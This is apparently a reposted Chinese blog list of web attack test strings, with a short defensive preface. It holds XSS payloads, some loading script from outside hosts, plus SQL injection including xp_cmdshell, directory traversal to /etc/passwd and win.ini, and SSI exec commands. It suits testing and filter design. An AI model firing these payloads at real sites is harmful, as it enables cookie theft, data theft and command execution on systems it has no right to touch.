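需要防范的XSS攻击
（说明：以下测试字符串除 XSS 外，还包含 SQL 注入、目录遍历和 SSI 命令注入的样例。对应的防护分别是：按输出上下文做编码、使用参数化查询、对文件路径做规范化校验并限制在允许的目录内、关闭不需要的 SSI exec 功能；列表中的大小写混写和 URL 编码变体说明，仅靠黑名单过滤这些字符串是不够的。）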
>
<
script
>
alert(document.cookie)
</
script
>
='>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(vulnerable)
</
script
>
%3Cscript%3Ealert('XSS')%3C/script%3E
<
script
>
alert('XSS')
</
script
>
<
img
src
="javascript:alert('XSS')"
>
%0a%0a
<
script
>
alert(\
"
Vulnerable\
"
)
</
script
>
.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<
script
>
alert('Vulnerable');
</
script
>
<
script
>
alert('Vulnerable')
</
script
>
?sql_debug=1
a%5c.aspx
a.jsp/
<
script
>
alert('Vulnerable')
</
script
>
a/
a?
<
script
>
alert('Vulnerable')
</
script
>
">
<
script
>
alert('Vulnerable')
</
script
>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E
&SESSION_ID
={SESSION_ID}
&SESSION_ID
=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"
<
XSS
>
=&{()}
<
IMG
SRC
="javascript:alert('XSS');"
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert("XSS")
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
"
<
IMG
SRC
=java\0script:alert(\"XSS\")
>
";' > out
<
IMG
SRC
=" javascript:alert('XSS');"
>
<
SCRIPT
>
a
=/
XSS
/
alert(a.source)
</
SCRIPT
>
<
BODY
BACKGROUND
="javascript:alert('XSS')"
>
<
BODY
ONLOAD
=alert('XSS')
>
<
IMG
DYNSRC
="javascript:alert('XSS')"
>
<
IMG
LOWSRC
="javascript:alert('XSS')"
>
<
BGSOUND
SRC
="javascript:alert('XSS');"
>
<
br
size
="&{alert('XSS')}"
>
<
LAYER
SRC
="http://xss.ha.ckers.org/a.js"
></
layer
>
<
LINK
REL
="stylesheet"
HREF
="javascript:alert('XSS');"
>
<
IMG
SRC
='vbscript:msgbox("XSS")'
>
<
IMG
SRC
="mocha:[code]"
>
<
IMG
SRC
="livescript:[code]"
>
<
META
HTTP-EQUIV
="refresh"
CONTENT
="0;url=javascript:alert('XSS');"
>
<
IFRAME
SRC
=javascript:alert('XSS')
></
IFRAME
>
<
FRAMESET
><
FRAME
SRC
=javascript:alert('XSS')
></
FRAME
></
FRAMESET
>
<
TABLE
BACKGROUND
="javascript:alert('XSS')"
>
<
DIV
STYLE
="background-image: url(javascript:alert('XSS'))"
>
<
DIV
STYLE
="behaviour: url('http://www.how-to-hack.org/exploit.html');"
>
<
DIV
STYLE
=" expression(alert('XSS'));"
>
<
STYLE
>
@im\port'\ja\vasc\ript:alert("XSS")';
</
STYLE
>
<
IMG
STYLE
='xss:expre\ssion(alert("XSS"))'
>
<
STYLE
TYPE
="text/javascript"
>
alert('XSS');
</
STYLE
>
<
STYLE
TYPE
="text/css"
>
.XSS
{
}
{
background-image
:
url("javascript:alert('XSS')")
;
}
</
STYLE
><
A
CLASS
=XSS
></
A
>
<
STYLE
type
="text/css"
>
BODY
{
}
{
background
:
url("javascript:alert('XSS')")
}
</
STYLE
>
<
BASE
HREF
="javascript:alert('XSS');//"
>
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<
XML
SRC
="javascript:alert('XSS');"
>
">
<
BODY
ONLOAD
="a();"
><
SCRIPT
>
function
a()
{alert('XSS');}
</
SCRIPT
><
"
<SCRIPT
SRC
=""
></
SCRIPT
>
<
IMG
SRC
="javascript:alert('XSS')"
<!--#exec cmd
="/bin/echo '<SCRIPT SRC'"
--
>
<!--
#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"
-->
<
IMG
SRC
="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"
>
<
SCRIPT
a
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
a
=">"
'' SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
"a
='
>
'
"
SRC=
"
http:
//
xss.ha.ckers.org/a.js"></SCRIPT>
<
SCRIPT
>
document.write(
"
<SCRI
"
);
</
SCRIPT
>
PT SRC="http://xss.ha.ckers.org/a.js">
</
SCRIPT
>
<
A
HREF
=http://www.gohttp://www.google.com/ogle.com
/>
link
</
A
>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
QQ:273352165 evlon#126.com 转载请注明出处。
原文地址:https://www.cnblogs.com/evlon/p/849543.html